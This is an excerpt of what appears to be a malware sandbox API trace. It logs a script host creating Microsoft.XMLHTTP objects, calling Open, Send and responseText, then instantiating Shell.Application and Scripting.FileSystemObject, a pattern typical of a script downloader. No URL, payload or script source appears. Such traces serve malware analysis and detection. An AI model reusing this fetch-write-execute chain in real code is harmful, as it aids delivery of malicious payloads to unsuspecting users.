	[0391.203] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0391.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0391.203] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0391.203] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0391.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0391.203] ??2@YAPEAX_K@Z () returned 0x62f310
	[0391.203] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0391.203] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0391.203] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0391.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0391.203] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0391.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.203] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0391.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0391.203] longjmp () 
	[0391.204] longjmp () 
	[0391.204] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0391.204] SysStringLen (param_1=0x0) returned 0x0
	[0391.204] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0391.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0391.204] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0391.204] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0391.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0391.204] ??2@YAPEAX_K@Z () returned 0x62f330
	[0391.204] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0391.204] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0391.204] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0391.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0391.204] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0391.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.205] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0391.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0391.205] longjmp () 
	[0391.205] longjmp () 
	[0391.205] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0391.205] SysStringLen (param_1=0x0) returned 0x0
	[0391.205] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0391.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0391.205] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0391.205] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0391.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0391.205] ??2@YAPEAX_K@Z () returned 0x62f310
	[0391.205] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f310) 
	[0391.205] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0391.205] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0391.205] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0391.205] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0391.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.206] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0391.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0391.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.206] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0391.206] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0392.082] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0392.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0392.082] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0392.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0392.082] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0392.082] SysStringLen (param_1=0x0) returned 0x0
	[0392.082] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0392.083] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0392.083] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0392.083] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0392.083] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0392.083] ??2@YAPEAX_K@Z () returned 0x62f350
	[0392.083] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0392.083] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0392.083] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0392.083] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0392.083] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0392.083] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0392.083] SysStringLen (param_1=0x0) returned 0x0
	[0392.083] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0392.086] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0392.086] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0392.086] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0392.086] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0392.086] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0392.086] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0392.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0392.634] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0392.634] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0392.635] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0392.635] SysStringLen (param_1=0x0) returned 0x0
	[0392.635] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0392.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0392.635] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0392.635] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0392.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0392.635] ??2@YAPEAX_K@Z () returned 0x62f310
	[0392.635] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0392.635] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0392.635] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0392.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0392.636] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0392.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0392.636] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0392.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0392.638] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0392.638] SysStringLen (param_1=0x0) returned 0x0
